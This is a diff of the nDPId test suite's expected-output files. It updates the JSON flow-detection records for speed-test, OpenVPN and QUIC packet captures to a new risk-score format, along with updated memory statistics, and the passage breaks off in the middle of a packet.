+00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ookla.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1491069108756,"flow_last_seen":1491069108794,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":342,"flow_tot_l4_payload_len":342,"flow_avg_l4_payload_len":85,"midstream":0,"ts_msec":1491069108794,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"46.44.253.187","src_port":51207,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Ookla","breed":"Safe","category":"Network"},"http": {}}
 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"ookla.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1491069115107,"flow_last_seen":1491069115107,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1491069115107,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"46.44.253.187","src_port":51215,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"ookla.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1491069115107,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1491069115107,"pkt":"gCqojWksxCwDBkn+CABFAABAzJ5AAEAGAADAqAEHLiz9u8gPH5CtI6zKAAAAALAC\/\/\/tyQAAAgQFtAEDAwUBAQgKDd4f9gAAAAAEAgAA"}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"ookla.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1491069115144,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1491069115144,"pkt":"xCwDBkn+gCqojWksCABFAAA8AABAADMGWiUuLP27wKgBBx+QyA8qkdUorSOsy6ASOJC7tQAAAgQFrAQCCAp\/4XceDd4f9gEDAwU="}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"ookla.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1491069115144,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1491069115144,"pkt":"gCqojWksxCwDBkn+CABFAAA0VElAAEAGAADAqAEHLiz9u8gPH5CtI6zLKpHVKYAQECztvQAAAQEICg3eIBp\/4Xce"}
-00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"ookla.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1491069115107,"flow_last_seen":1491069115172,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1491069115172,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"46.44.253.187","src_port":51215,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"Ookla","breed":"Safe","category":"Network"}}
-00706{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5086,"source":"ookla.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":5066,"flow_first_seen":1491069115107,"flow_last_seen":1491069155251,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4346133,"flow_avg_l4_payload_len":857,"midstream":0,"ts_msec":1491069155251,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"46.44.253.187","src_port":51215,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"Ookla","breed":"Safe","category":"Network"}}
+00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"ookla.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1491069115107,"flow_last_seen":1491069115172,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1491069115172,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"46.44.253.187","src_port":51215,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"Ookla","breed":"Safe","category":"Network"}}
+00823{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5086,"source":"ookla.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":5066,"flow_first_seen":1491069115107,"flow_last_seen":1491069155251,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4346133,"flow_avg_l4_payload_len":857,"midstream":0,"ts_msec":1491069155251,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"46.44.253.187","src_port":51215,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"Ookla","breed":"Safe","category":"Network"}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5086,"source":"ookla.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1491069108756,"flow_last_seen":1491069114084,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":457,"flow_tot_l4_payload_len":2980,"flow_avg_l4_payload_len":149,"midstream":0,"ts_msec":1491069155251,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"46.44.253.187","src_port":51207,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00156{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":5086,"source":"ookla.pcap","alias":"nDPId-test","total-events-serialized":14}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
@@ -20,10 +20,10 @@
 ~~ total active/idle flows...: 2/2
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4753795 bytes
-~~ total memory freed........: 4753795 bytes
-~~ total allocations/frees...: 104646/104646
+~~ total memory allocated....: 4838420 bytes
+~~ total memory freed........: 4838420 bytes
+~~ total allocations/frees...: 106236/106236
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 161 chars
-~~ json string max len.......: 711 chars
-~~ json string avg len.......: 501 chars
+~~ json string max len.......: 828 chars
+~~ json string avg len.......: 556 chars
diff --git a/test/results/openvpn.pcap.out b/test/results/openvpn.pcap.out
index 1e007325b..0b0fa4d4a 100644
--- a/test/results/openvpn.pcap.out
+++ b/test/results/openvpn.pcap.out
@@ -3,20 +3,20 @@
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1467904946700,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1467904946700,"pkt":"hCYVLjtSAA6OGXEMCABFAAA8ANVAAEAGYbLAqAFNLmXn2ursAbu+lXueAAAAAKACchBbjAAAAgQFtAQCCAoADXtLAAAAAAEDAwE="}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1467904946755,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1467904946755,"pkt":"AA6OGXEMhCYVLjtSCABFoAA8AABAADQGbecuZefawKgBTQG76uxsxVWWvpV7n6AScSBx2QAAAgQFtAQCCAoANCgCAA17SwEDAwE="}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1467904946755,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1467904946755,"pkt":"hCYVLjtSAA6OGXEMCABFAAA0ANZAAEAGYbnAqAFNLmXn2ursAbu+lXufbMVVl4AQOQjYsgAAAQEICgANe1AANCgC"}
-00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1467904946700,"flow_last_seen":1467904947753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1467904947753,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"46.101.231.218","src_port":60140,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}}
-00706{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":96,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":95,"flow_first_seen":1467904946700,"flow_last_seen":1467905010834,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":9094,"flow_avg_l4_payload_len":95,"midstream":0,"ts_msec":1470218591746,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"46.101.231.218","src_port":60140,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}}
+00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1467904946700,"flow_last_seen":1467904947753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1467904947753,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"46.101.231.218","src_port":60140,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}}
+00815{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":96,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":95,"flow_first_seen":1467904946700,"flow_last_seen":1467905010834,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":9094,"flow_avg_l4_payload_len":95,"midstream":0,"ts_msec":1470218591746,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"46.101.231.218","src_port":60140,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":96,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470218591746,"flow_last_seen":1470218591746,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"ts_msec":1470218591746,"l3_proto":"ip4","src_ip":"192.168.43.12","dst_ip":"139.59.151.137","src_port":41507,"dst_port":13680,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1470218591746,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"ts_msec":1470218591746,"pkt":"mAyC0zx8AAjKQoXqCABFAABG3rhAAEARTXXAqCsMizuXiaIjNXAAMosJOLAsz\/G18BdPwJFmbjsSS62jkXMxe5OXItH+Y74AAAABV6HBXwAAAAAA"}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1470218591941,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":96,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":96,"pkt_l4_len":62,"ts_msec":1470218591941,"pkt":"AAjKQoXqmAyC0zx8CABFAABSYIhAADIR2ZmLO5eJwKgrDDVwoiMAPhWBQPd\/wu\/b4j9X3sTI1WVNByO\/jAvlQThWMnDPrhMAAAABV6HBXwEAAAAAsCzP8bXwF08AAAAA"}
-00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":97,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470218591746,"flow_last_seen":1470218591941,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1470218591941,"l3_proto":"ip4","src_ip":"192.168.43.12","dst_ip":"139.59.151.137","src_port":41507,"dst_port":13680,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}}
+00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":97,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470218591746,"flow_last_seen":1470218591941,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1470218591941,"l3_proto":"ip4","src_ip":"192.168.43.12","dst_ip":"139.59.151.137","src_port":41507,"dst_port":13680,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}}
 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1470218591942,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1470218591942,"pkt":"mAyC0zx8AAjKQoXqCABFAABO3uZAAEARTT\/AqCsMizuXiaIjNXAAOpZEKLAsz\/G18BdPyDdJemqNaU65YLasCHjnV9mH+DAAAAACV6HBXwEAAAAA93\/C79viP1c="}
-00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":179,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":83,"flow_first_seen":1470218591746,"flow_last_seen":1470218600860,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":1172,"flow_tot_l4_payload_len":10073,"flow_avg_l4_payload_len":121,"midstream":0,"ts_msec":1472334890224,"l3_proto":"ip4","src_ip":"192.168.43.12","dst_ip":"139.59.151.137","src_port":41507,"dst_port":13680,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}}
+00821{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":179,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":83,"flow_first_seen":1470218591746,"flow_last_seen":1470218600860,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":1172,"flow_tot_l4_payload_len":10073,"flow_avg_l4_payload_len":121,"midstream":0,"ts_msec":1472334890224,"l3_proto":"ip4","src_ip":"192.168.43.12","dst_ip":"139.59.151.137","src_port":41507,"dst_port":13680,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":179,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1472334890224,"flow_last_seen":1472334890224,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"ts_msec":1472334890224,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"139.59.151.137","src_port":13680,"dst_port":13680,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":179,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1472334890224,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"ts_msec":1472334890224,"pkt":"mAyC0zx8MFLLbJwbCABFAABGe8pAAEARsF3AqCsSizuXiTVwNXAAMg7DOGYO4pqkkLBZfF5v2e87DGOeGNd7GPORrKCUl+wAAAABV8IMKgAAAAAA"}
 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":180,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1472334892420,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"ts_msec":1472334892420,"pkt":"mAyC0zx8MFLLbJwbCABFAABGfNNAAEARr1TAqCsSizuXiTVwNXAAMg7DOGYO4pqkkLBZptsOrY2Z8Me\/lrzRmp5vsU3x26QAAAACV8IMKgAAAAAA"}
 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":181,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1472334892467,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":96,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":96,"pkt_l4_len":62,"ts_msec":1472334892467,"pkt":"MFLLbJwbmAyC0zx8CABFAABSgmRAADERuLeLO5eJwKgrEjVwNXAAPoh1QDWQheTdAi5E5ZNzw1yvtD56Ix7qRbnOSoCURYgAAAABV8IMLQEAAAAAZg7imqSQsFkAAAAA"}
-00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":181,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1472334890224,"flow_last_seen":1472334892467,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1472334892467,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"139.59.151.137","src_port":13680,"dst_port":13680,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}}
-00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":298,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":120,"flow_first_seen":1472334890224,"flow_last_seen":1472334909465,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":1245,"flow_tot_l4_payload_len":23132,"flow_avg_l4_payload_len":192,"midstream":0,"ts_msec":1472334909465,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"139.59.151.137","src_port":13680,"dst_port":13680,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}}
+00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":181,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1472334890224,"flow_last_seen":1472334892467,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1472334892467,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"139.59.151.137","src_port":13680,"dst_port":13680,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}}
+00822{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":298,"source":"openvpn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":120,"flow_first_seen":1472334890224,"flow_last_seen":1472334909465,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":1245,"flow_tot_l4_payload_len":23132,"flow_avg_l4_payload_len":192,"midstream":0,"ts_msec":1472334909465,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"139.59.151.137","src_port":13680,"dst_port":13680,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}}
 00157{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":298,"source":"openvpn.pcap","alias":"nDPId-test","total-events-serialized":20}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 298/298
@@ -26,10 +26,10 @@
 ~~ total active/idle flows...: 3/3
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4607919 bytes
-~~ total memory freed........: 4607919 bytes
-~~ total allocations/frees...: 99858/99858
+~~ total memory allocated....: 4692216 bytes
+~~ total memory freed........: 4692216 bytes
+~~ total allocations/frees...: 101448/101448
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 162 chars
-~~ json string max len.......: 718 chars
-~~ json string avg len.......: 510 chars
+~~ json string max len.......: 827 chars
+~~ json string avg len.......: 564 chars
diff --git a/test/results/os_detected.pcapng.out b/test/results/os_detected.pcapng.out
index 16ce095c0..754b078b7 100644
--- a/test/results/os_detected.pcapng.out
+++ b/test/results/os_detected.pcapng.out
@@ -1,8 +1,8 @@
 00445{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"os_detected.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"os_detected.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1611427514609,"flow_last_seen":1611427514609,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1611427514609,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"8.8.8.8","src_port":39821,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"os_detected.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1611427514609,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"ts_msec":1611427514609,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAZdFAAEAR\/ePAqAGACAgICJuNAbsE7AYLxP8AAB0Inw\/JO07eNjIIgxX\/XKNBIUIARMqZ8UiDvq\/ZLsUdz0scSMu9YDA5XC\/EJ\/VWdcKmIJjpSLXMxg05sWM0HmWuizvek0EXnlQzmUN9ovr2\/hk4L4+drmSHxo9NOB+GUfgxVDY8jS5sYut7pzwyS1v0Tzd0E1TyJIWDsBfvZlI4bbIIRlefQgOB0WdUqMEfHzxzcbGs6dNO+9vDaznNJ4dGUWqyjTrP1xrbA5ARI5dTVb4R+7D0v8orWpuNvxjoiVb36LCsfL0SbVo2GhqQoHke+Z\/B2D+0+r7INWQc1iHzAG+HeNlA1LtOtYyHAJVB+P59vqKsfmDTE8RgVpXe1x30lS+4YR7jaekw9qCyZHC0kKXvmsPCqZ\/9qa5gMMsfGTjnOTdcid5WA6CyHhSK2HTQW4GkzXHYPreaFIFRc0y9+aMq1Mfl97S1vnvDvIbG91Np67AM6LV1xuilkclYvUim1l1JoFQCUfe6m3PyP+gIQTFerpfrZHjXHVmed8ZubnloXre0\/Z3B2Oh1fmjBjrSNQGdC4YK\/DVld8Ug+FRG0kxgDMCgRJ2S9dOYEMkKgzq\/BKvgwUYmMidXS+F+tMJvoHQSzv3bhpGgehHuZOqNIC3d6Rty6h0nPb+BYsf5E1IpIcwzMB2CvZbT77jViKMoAt5RtufWUmoQ2qymcAa7AXbvCL5L7qI\/1oplTPNm0Ysi0JSUXXf61rlCNL1vc+XNbLSeTg2Vz2fPTbPH7hg\/8qinCri68WhuYiT\/rvuXkVqGxWKJq5b1oM\/AIky7+yMfObOfk9kQ3thgac0pRO1LAAwjECH\/XdGHuEsxIejknnknLjBpjmS+2c+909N0TGc\/NPsDPdaLmN10HnCVLaT1WmruOxWZDa3gV1s3K4IKU6NwqVeHNSYO5xx5HEC7tZU+y4E74cmfLayIxxbdgkahHRv9ATyXrtMLRAHqK8ZsoIIw0D9NAPBA355APW3UhJ\/Z9ZHxppKcR2\/OPN1KQqoIrhRGT9bUzB7Xkn\/VMWRYSTXTiaAYMcb8dRkENbKtVWSIk9LJFrE8pIXivmB2tWlt1t6y+TR30oU1\/NUX3jGhxE7t44s+NhGXfBpl2YQbF4zUhYeZAUzU9QbWzyGdZYarMNxVUgYeW9stlVHB0y\/otPwbX9mpoJ+Dy1FXdgrsIv1LAkh1\/3bdSFFfKVJUwX6EGqQRQU02j\/r+E7RZ0bE01QtNNSuMRMdJX2zJtopXBwZLz8h67datSO+I1wfoRzj4VUG35Q8hcFywG\/xq04McVVySWGNnMos9RmQkhysf\/lc3FuHHnMMA\/XcGqeB2biYiiwAKDCGuBCGTLrEYhV1yIzE4vEhvJvg325fJl3DNeUSuAwqKe9SjUjQtv+EVpEiYxa